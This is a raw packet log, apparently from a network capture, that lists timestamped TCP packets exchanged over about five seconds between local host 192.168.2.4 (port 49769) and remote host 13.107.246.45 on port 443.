Oct 7, 2024 18:47:15.907598972 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.949318886 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.958120108 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.966227055 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.968518972 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:15.993726015 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:15.995784044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.039397001 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.040770054 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.042965889 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.042979956 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.054445982 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.056392908 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.082037926 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.083993912 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.127398014 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.129601955 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.131601095 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.131618977 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.143745899 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.145627022 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.170368910 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.172442913 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.215409040 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.217622042 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.220474958 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.223428965 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.232933998 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.235493898 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.258709908 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.261533976 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.303419113 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.307782888 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.310214043 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.310256004 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.320828915 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.322997093 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.347649097 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.349716902 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.391421080 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.394445896 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.397950888 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.398001909 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.399633884 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.401588917 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.411170959 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.413184881 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.439449072 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.441512108 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.482223988 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.483975887 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.499103069 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.500849962 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.528676033 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.530981064 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.570554018 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.572244883 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.587729931 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.589366913 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.635397911 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.641333103 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.643006086 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.643035889 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.659199953 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.660964012 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.677324057 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.679296970 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.723395109 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.726310968 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.729233027 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.729254007 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.731014967 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.733381033 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.750308990 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.753407001 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.767937899 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.770628929 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.811424971 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.814187050 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.817792892 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.817835093 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.839329958 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.842566013 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.874864101 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.877665043 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.902683973 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.905313969 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.940103054 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.943126917 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:16.965071917 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:16.967626095 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.000157118 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.004270077 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.029994965 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.033179045 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.075392962 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.106499910 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.110399961 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.110418081 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.112828016 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.123254061 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.126391888 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.171408892 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.187587976 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.190979004 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.191018105 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.209017038 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.211853027 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.247736931 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.250695944 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.287874937 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.292130947 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.298924923 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.301173925 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.337330103 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.341005087 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.377367020 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.380170107 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.387276888 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.389427900 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.427232027 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.429917097 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.465421915 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.468823910 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.475364923 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.477560997 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.517555952 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.520081043 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.553282976 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.556448936 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.565059900 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.567482948 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.611428022 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.632507086 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.635848999 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.635879993 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.640938997 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.644133091 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.653958082 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.656703949 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.699419022 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.717916965 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.721440077 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.721499920 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.724176884 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.726108074 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.733321905 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.735307932 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.745750904 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.747545004 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.791419029 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.807816982 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.810869932 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.810905933 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.817585945 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.819715977 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.835479021 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.837712049 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.879395008 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.889628887 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.896153927 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.896190882 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.899755955 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.902121067 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.939294100 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:17.942222118 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:17.983418941 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.013458967 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.016542912 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.016586065 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.062295914 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.068536997 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.068576097 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.147816896 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.151053905 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.151073933 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.194566011 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.200475931 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.200510979 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.224224091 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.269246101 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.269320965 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.269328117 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.273318052 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.273452997 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.273485899 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.274122000 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.290055037 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.291851044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.306418896 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.308294058 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.355397940 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.570053101 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.570092916 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.570272923 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.573997974 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.574009895 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.574930906 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.574935913 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.575745106 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.575748920 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.676317930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.725873947 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.725897074 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.729192019 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.729208946 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.729243994 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.729247093 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.743921041 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.745784044 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.761526108 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.803960085 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.803970098 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.809262037 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.809391022 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.809425116 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.833357096 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.836486101 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.844597101 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.846437931 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.887423038 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.897418976 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.899733067 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.899750948 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.921402931 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.923537016 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.932440996 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.934273958 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.975416899 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.982549906 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.984729052 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:18.984740973 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.987687111 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:18.989516973 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.011539936 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.013591051 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.022650957 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.025156021 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.070555925 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.074580908 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.101300001 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.104197025 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.110337019 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.112464905 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.158586979 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.162673950 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.164163113 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.166862965 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.193308115 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.196290016 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.202444077 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.204605103 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.246845007 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.249392986 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.266907930 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.269429922 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.284544945 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.286695957 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.327419043 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.331083059 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.333966017 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.334003925 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.339345932 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.342005968 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.359977961 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.362754107 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.376403093 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.396680117 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.422235966 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.425977945 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.448939085 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.452208042 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.465034008 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.467555046 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.510082006 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.513847113 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.536751986 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.539336920 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.553256035 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.555396080 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.595397949 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.598138094 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.600402117 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.600450039 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.634316921 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.639667988 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.642117023 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.694587946 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.694596052 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.700426102 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.736769915 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.740971088 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.787414074 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.804153919 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.804174900 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.804373026 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.808092117 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.808128119 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.808748007 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.808782101 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.830200911 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.830267906 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.905783892 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.905963898 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.971043110 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.971088886 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.972901106 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.972939014 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.981606960 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.987710953 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:19.987778902 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:19.987787008 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.038423061 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.067135096 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.067329884 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.117263079 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.163350105 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.258024931 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.261090040 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.261128902 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.264827013 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.266377926 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.266412020 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.278527021 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.323404074 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.352718115 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.352819920 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.404498100 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.404555082 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.405952930 CEST	49769	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:20.405956984 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.408185005 CEST	443	49769	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:20.416220903 CEST	49769	443	192.168.2.4	13.107.246.45
